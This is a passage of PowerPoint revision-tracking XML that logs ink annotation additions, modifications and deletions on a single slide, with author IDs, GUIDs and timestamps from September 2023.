        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="5" creationId="{601BDFD1-5E8B-044C-50B6-7B998E9BC0EB}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:03.499" v="4668" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="7" creationId="{27EC9AF3-E267-94A6-B348-47B7EBBAAD4F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:03.108" v="4667"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="8" creationId="{80AAD672-E94F-1EC6-0944-59472EBCFF30}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="10" creationId="{C17B6017-47A2-F030-E779-8FCBE8E1E680}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="11" creationId="{98198D23-FD86-3134-3293-3F63C0B1CAF7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="12" creationId="{63A81EAD-9E9C-2E06-2F60-395F1ECD8887}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="13" creationId="{BFD722A1-C698-193D-5FB0-21C31EE237CA}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="14" creationId="{034B8DF8-87A5-3DF6-690E-237B26617269}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="15" creationId="{2431A6B6-E207-4151-4359-EBEDCFE6A942}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="16" creationId="{873D3446-5543-9DB5-04B3-894C179FC06C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="17" creationId="{BEB01D4C-CC6B-2D19-3EC7-90B5CFEC4F00}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:37.904" v="4703"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="19" creationId="{AA8F5050-4CB1-3325-4AC9-AB367789563E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="21" creationId="{5ECAE224-7583-EDA9-A46B-B14C932298FA}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="22" creationId="{A33297D3-6859-B663-7100-3BF9BEDAB021}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="23" creationId="{0A248632-67F1-1141-08E0-638383FF2037}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="24" creationId="{BD1D0C5A-38DD-F08B-89F8-BDAC7035ACF6}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="25" creationId="{31055DBF-6D03-1D68-C250-DA021CD8DEFD}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="26" creationId="{A846F06D-4C9B-50F8-7CA0-25030C88B8AB}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="27" creationId="{994A038C-4AB0-2098-5537-71A794A3D6F6}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="28" creationId="{56A6A791-283C-FACF-E842-E89A63F99F9E}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="30" creationId="{7AD0A067-B529-7C81-09E0-BA8655D3FBC9}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="31" creationId="{031D927A-71BB-13E4-3783-A99A1853B84D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="32" creationId="{15149E86-1633-7F4F-1B84-6CAF0F9A07FF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="33" creationId="{7F6F41E6-5E02-35E1-5406-86A5795C5D34}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="34" creationId="{032A9DD2-093A-2AD4-8F41-C16210065551}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="35" creationId="{32B0593C-E303-46D9-7D7A-822861CB8135}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="36" creationId="{11C08223-FAC4-D0AA-1B91-A30EE84075A2}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="37" creationId="{914BAEBF-8B66-0F61-2914-4E30CCD29EF0}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="38" creationId="{CA95BFFA-D4D4-32E6-3D49-332F196E155C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="39" creationId="{3EBBF78A-1325-6463-95A5-7899048D8EB4}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="40" creationId="{69751993-7D6F-B61C-113C-F3255E3D00E2}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="41" creationId="{97451ED2-528D-D572-3047-7AAE061A68A8}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="42" creationId="{57053711-F637-77C5-4039-840DFC410940}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="43" creationId="{B2586D7D-1DBB-8FFE-1995-939BEF469136}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="48" creationId="{FEE511E1-6A69-E8FC-5487-46BA724B8B10}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="49" creationId="{EF1792DF-74A8-3BB4-3F8C-1F60E4DB59F3}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="50" creationId="{B1DBF282-8A21-3690-664B-ABB8221BF934}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:40.783" v="4707" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="51" creationId="{B428B971-3360-F70E-9820-B0888CAE6E96}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="53" creationId="{3E5C3AC5-53F6-66BF-69A2-443502C8346F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="54" creationId="{74D92125-A12C-09D1-29EE-CE92A4F3B25A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="55" creationId="{FC328285-7BC1-03A1-5C7C-2F33165289EF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="56" creationId="{BE3A7D11-650C-CACC-C935-53DCB9886E34}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="57" creationId="{C0797A27-0870-0F89-AF48-4969073837C4}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="58" creationId="{95B2C97D-4994-BC5B-84B4-F8418590623F}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="59" creationId="{36FE5A2F-34FC-BB39-645E-B81739234C3A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="60" creationId="{40631F42-ECAB-43CB-5BF6-6B4DE6883410}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="61" creationId="{FDB23202-E2BC-805D-E876-29A2A0FA08AC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:53.519" v="4720"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="62" creationId="{DDBDE64E-F397-9727-8F1F-1AD002EA1D07}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:55.351" v="4722"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="63" creationId="{E80A1115-3E56-9882-E967-5EC40F080331}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:06:55.351" v="4722"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="65" creationId="{58B57AAC-3FA7-CA30-D585-BCB11E8DEA6B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="67" creationId="{4C5E2542-EAA9-5D10-4D64-04192A350FB3}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="68" creationId="{81C94DD6-FC62-7280-69D2-50B32D2FC15A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="69" creationId="{D93C6B70-E4DB-46B6-9EA2-BE27BB134B05}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:03.395" v="4727"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="70" creationId="{D7E13CC4-87C1-AAC7-9110-CECA6FA08582}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="72" creationId="{75EB6694-3FBD-0646-4832-225519BC48A8}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:07:16.598" v="4730"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="73" creationId="{8FD17A1C-DD0C-AF71-32DB-4E2DF141FC42}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="75" creationId="{C8FDC76B-29C7-FCF9-6694-036772A75D34}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:54.226" v="4817"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3077727853" sldId="277"/>
            <ac:inkMk id="76" creationId="{5961019C-4521-76B6-0CD1-C2E03FA3DFB5}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
